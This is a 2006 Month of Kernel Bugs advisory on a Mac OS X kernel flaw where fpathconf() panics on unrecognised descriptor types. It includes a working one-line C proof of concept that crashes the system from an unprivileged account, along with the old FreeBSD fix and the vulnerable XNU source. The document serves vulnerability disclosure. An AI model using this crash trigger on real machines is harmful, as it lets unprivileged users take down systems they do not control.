|
| From: | | | Date: | 11.11.2006 | | Subject: | MOKB-09-11-2006 |
Title: Mac OS X fpathconf() syscall denial of service Warning - wet floor!
Description: Failure to handle unknown file types by the Mac OS X kernel (XNU) fpathconf() syscall causes a kernel panic, leading to an exploitable local denial of service by non-privileged users. The bug was fixed by FreeBSD on Tue Jun 27 23:08:36 2000 UTC (6 years, 4 months ago).
Author/Contributor: Ilja Van Sprundel - found issue, reported to Apple time ago (silently, yet partially, fixed; thus still broken).
LMH <lmh[at]info-pull.com> - MOKB release, "proof of concept".
References:
Proof of concept or exploit: One-liner:
#include <unistd.h>
#include <semaphore.h>
int main() {
fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}
Debugging information:
It's been tested on an up-to-date (09-11-2006) Mac OS X installation, running on an Intel "shipping" Mac.
rome:~ lmh$ uname -a
Darwin rome.local 8.8.1 Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006;
root:xnu-792.13.8.obj~1/RELEASE_I386 i386 i386
===================================================================
RCS file: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v
retrieving revision 1.84
retrieving revision 1.85
diff -u -p -r1.84 -r1.85
--- src/sys/kern/kern_descrip.c 2000/05/26 02:04:33 1.84
+++ src/sys/kern/kern_descrip.c 2000/06/27 23:08:36 1.85 <--- 6 years, 4 months ago
@@ -36,7 +36,7 @@
* SUCH DAMAGE.
*
* @(#)kern_descrip.c 8.6 (Berkeley) 4/19/94
- * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.84 2000/05/26 02:04:33 jake Exp $
+ * $FreeBSD: /usr/local/www/cvsroot/FreeBSD/src/sys/kern/kern_descrip.c,v 1.85 2000/06/27 23:08:36 alfred Exp $
*/
#include "opt_compat.h"
@@ -642,7 +642,7 @@ fpathconf(p, uap)
return (VOP_PATHCONF(vp, uap->name, p->p_retval));
default:
- panic("fpathconf");
+ return (EOPNOTSUPP);
}
/*NOTREACHED*/
}
------ xnu-792.6.76/bsd/kern/kern_descrip.c
/*
* Return pathconf information about a file descriptor.
*/
int
fpathconf(p, uap, retval)
struct proc *p;
register struct fpathconf_args *uap;
register_t *retval;
{
int fd = uap->fd;
struct fileproc *fp;
struct vnode *vp;
struct vfs_context context;
int error = 0;
short type;
caddr_t data;
AUDIT_ARG(fd, uap->fd);
if ( (error = fp_lookup(p, fd, &fp, 0)) )
return(error);
type = fp->f_type;
data = fp->f_data;
switch (type) {
case DTYPE_SOCKET:
(...)
error = 0;
goto out;
case DTYPE_PIPE:
*retval = PIPE_BUF;
error = 0;
goto out;
case DTYPE_VNODE:
(...)
goto out;
case DTYPE_PSXSHM:
case DTYPE_KQUEUE:
error = EINVAL;
goto out;
default:
panic("fpathconf (unrecognized - %d)", type); <----- not covered cases, panic.
}
/*NOTREACHED*/
out:
fp_drop(p, fd, fp, 0);
return(error);
}
------ xnu-792.6.76/bsd/kern/kern_descrip.c
|
